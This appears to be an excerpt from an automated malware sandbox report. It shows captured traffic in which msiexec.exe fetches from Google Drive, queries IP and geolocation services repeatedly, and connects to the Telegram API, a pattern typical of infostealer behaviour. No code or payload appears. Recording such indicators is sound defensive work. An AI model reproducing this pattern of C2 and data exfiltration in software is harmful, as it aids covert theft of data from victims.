                                                                                                                                                                  Feb 25, 2025 08:27:48.365029097 CET44349865104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.365098000 CET44349865104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.365164995 CET49865443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:48.365772963 CET49865443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:48.396749020 CET4986080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:48.398072958 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:48.401915073 CET8049860158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.401995897 CET4986080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:48.403167009 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.403239965 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:48.403321981 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:48.408318996 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.987392902 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.989368916 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:48.989437103 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:48.989540100 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:48.989917040 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:48.989929914 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.034456015 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.445765018 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.451344967 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:49.451365948 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.591371059 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.591449022 CET44349875104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.591600895 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:49.592293024 CET49875443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:49.615993023 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.617353916 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.621201992 CET8049870158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.621264935 CET4987080192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.622365952 CET8049881158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:49.625049114 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.625124931 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:49.630855083 CET8049881158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.713785887 CET8049881158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.715585947 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:50.715636015 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.715714931 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:50.716027975 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:50.716047049 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:50.768923998 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.178220034 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.179893017 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.179932117 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324511051 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324584961 CET44349887104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.324688911 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.325311899 CET49887443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.367939949 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.369010925 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.373182058 CET8049881158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.374068022 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.374119997 CET4988180192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.374160051 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.374267101 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:51.379240990 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.957364082 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.958853006 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.958887100 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:51.958981991 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.959286928 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:51.959296942 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.003212929 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.413939953 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.415852070 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.415894032 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556088924 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556150913 CET44349899104.21.96.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.556202888 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.556617022 CET49899443192.168.2.4104.21.96.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.747050047 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.752444029 CET8049893158.101.44.242192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.752507925 CET4989380192.168.2.4158.101.44.242
                                                                                                                                                                  Feb 25, 2025 08:27:52.756226063 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756268024 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.756340027 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756782055 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:52.756794930 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.377994061 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.378204107 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.380194902 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.380222082 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.380494118 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.385106087 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.427331924 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628149986 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628222942 CET44349905149.154.167.220192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:53.628382921 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:53.631210089 CET49905443192.168.2.4149.154.167.220
                                                                                                                                                                  Feb 25, 2025 08:27:59.796832085 CET4983080192.168.2.4158.101.44.242
                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                  Feb 25, 2025 08:27:34.686697960 CET5248053192.168.2.41.1.1.1
                                                                                                                                                                  Feb 25, 2025 08:27:34.693865061 CET53524801.1.1.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:35.923798084 CET5773653192.168.2.41.1.1.1
                                                                                                                                                                  Feb 25, 2025 08:27:35.931056023 CET53577361.1.1.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:40.351269007 CET6308853192.168.2.41.1.1.1
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET53630881.1.1.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:41.670273066 CET6104853192.168.2.41.1.1.1
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET53610481.1.1.1192.168.2.4
                                                                                                                                                                  Feb 25, 2025 08:27:52.747853994 CET5573153192.168.2.41.1.1.1
                                                                                                                                                                  Feb 25, 2025 08:27:52.755647898 CET53557311.1.1.1192.168.2.4
                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                  Feb 25, 2025 08:27:34.686697960 CET192.168.2.41.1.1.10xcbbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:35.923798084 CET192.168.2.41.1.1.10x3027Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.351269007 CET192.168.2.41.1.1.10x88d9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.670273066 CET192.168.2.41.1.1.10x2e5aStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:52.747853994 CET192.168.2.41.1.1.10x4e23Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                  Feb 25, 2025 08:27:34.693865061 CET1.1.1.1192.168.2.40xcbbNo error (0)drive.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:35.931056023 CET1.1.1.1192.168.2.40x3027No error (0)drive.usercontent.google.com142.250.185.193A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:40.358627081 CET1.1.1.1192.168.2.40x88d9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.96.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.16.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.64.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.32.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:41.689589977 CET1.1.1.1192.168.2.40x2e5aNo error (0)reallyfreegeoip.org104.21.48.1A (IP address)IN (0x0001)false
                                                                                                                                                                  Feb 25, 2025 08:27:52.755647898 CET1.1.1.1192.168.2.40x4e23No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                                  • drive.google.com
                                                                                                                                                                  • drive.usercontent.google.com
                                                                                                                                                                  • reallyfreegeoip.org
                                                                                                                                                                  • api.telegram.org
                                                                                                                                                                  • checkip.dyndns.org
                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  0192.168.2.449812158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:40.377614021 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:40.949151993 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:40 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: e40c8042fa4dc8f3c0efdba4b3524584
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                  Feb 25, 2025 08:27:40.973191023 CET127OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Feb 25, 2025 08:27:41.130731106 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:41 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 25a8a12469937b3206e6a426f6b23bc5
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                                                                                  Feb 25, 2025 08:27:42.383109093 CET127OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Feb 25, 2025 08:27:42.539824009 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:42 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: d1fc9e021f1471620d6beddc304a6b51
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  1192.168.2.449830158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:43.175154924 CET127OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Feb 25, 2025 08:27:43.748409033 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:43 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 3595a90158435eb321dbbc16b0212c74
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  2192.168.2.449842158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:44.384087086 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:44.989926100 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:44 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 97261df69cf40663abb32f8029c117de
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  3192.168.2.449851158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:45.617341042 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:46.190720081 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:46 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: ba91a0b33f22cc0ab737061d34dd397b
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  4192.168.2.449860158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:46.823997021 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:47.759228945 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:47 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 9e7a19a22e351aa79d38cf44d3d65d44
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  5192.168.2.449870158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:48.403321981 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:48.987392902 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:48 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 011b3798f37d3194537a32d1bb31b50e
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  6192.168.2.449881158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:49.625124931 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:50.713785887 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:50 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 3b041c54dabd2b8c44bf29f4d1a15d3f
                                                                                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                  7192.168.2.449893158.101.44.242805660C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                  Feb 25, 2025 08:27:51.374267101 CET151OUTGET / HTTP/1.1
                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                                                                  Host: checkip.dyndns.org
                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                  Feb 25, 2025 08:27:51.957364082 CET321INHTTP/1.1 200 OK
                                                                                                                                                                  Date: Tue, 25 Feb 2025 07:27:51 GMT
                                                                                                                                                                  Content-Type: text/html
                                                                                                                                                                  Content-Length: 104
                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                  X-Request-ID: 18cf8fc56d1cb7193e9b107e54b21ffe
